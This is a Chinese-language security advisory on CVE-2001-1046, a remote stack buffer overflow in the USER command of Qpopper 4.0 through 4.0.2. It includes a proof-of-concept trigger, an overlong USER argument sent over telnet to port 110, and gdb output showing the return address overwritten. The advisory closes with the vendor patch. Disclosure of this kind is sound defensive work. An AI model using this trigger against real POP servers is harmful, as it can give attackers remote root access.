发布日期：2001-06-05
更新日期：2001-06-08

受影响系统：

QUALCOMM Qpopper 4.0.2
QUALCOMM Qpopper 4.0.1
QUALCOMM Qpopper 4.0

不受影响系统：

QUALCOMM Qpopper 4.0.3
QUALCOMM Qpopper 3.x
QUALCOMM Qpopper 2.53

描述：

---

BUGTRAQ  ID: 2811
CVE(CAN) ID: CVE-2001-1046

Qpopper是QUALCOMM公司提供的免费pop服务器软件。可应用于大多数的Unix/Linux/*BSD
平台下。

Qpopper 4.0系列中存在一个远程缓冲区溢出漏洞。如果向"USER"命令提供一个超长的参
数，就可能触发一个基于堆栈的缓冲区溢出。小心地构造溢出代码，攻击者可以远程获取
root权限。

攻击者进行攻击并不需要一个有效帐号。

<*来源：Gustavo Viscaino (suporte@tks.com.br)
        Renaud Deraison (bugs@cvs.nessus.org）
*>




测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Renaud Deraison (bugs@cvs.nessus.org） 提供了如下测试代码：

$ telnet qpopserver 110

USER XXXXX[....]XXXXX\r\n


Program received signal SIGSEGV, Segmentation fault.
strcpy (dest=0xbfffca95 'X' <repeats 200 times>...,
    src=0xbfffca54 'X' <repeats 200 times>...)
    at ../sysdeps/generic/strcpy.c:38
38      ../sysdeps/generic/strcpy.c: No such file or directory.
(gdb) bt
#0  strcpy (dest=0xbfffca95 'X' <repeats 200 times>...,
    src=0xbfffca54 'X' <repeats 200 times>...)
    at ../sysdeps/generic/strcpy.c:38
#1  0x805078c in pop_user (p=0xbfffca2c) at pop_user.c:198
#2  0x8050e58 in qpopper (argc=1482184792, argv=0x58585858) at
popper.c:321
#3  0x58585858 in ?? ()
Cannot access memory at address 0x58585858



建议：

---

厂商补丁：

Qpopper 4.0.3已经修复了这个漏洞。我们建议正在使用4.0系列的用户立刻更新到4.0.3.
ftp://ftp.qualcomm.com/eudora/servers/unix/popper/
我们也建议使用此软件的用户随时关注厂商的主页以获取最新版本：
http://www.eudora.com/qpopper_general/


浏览次数：3750
严重程度：0（网友投票）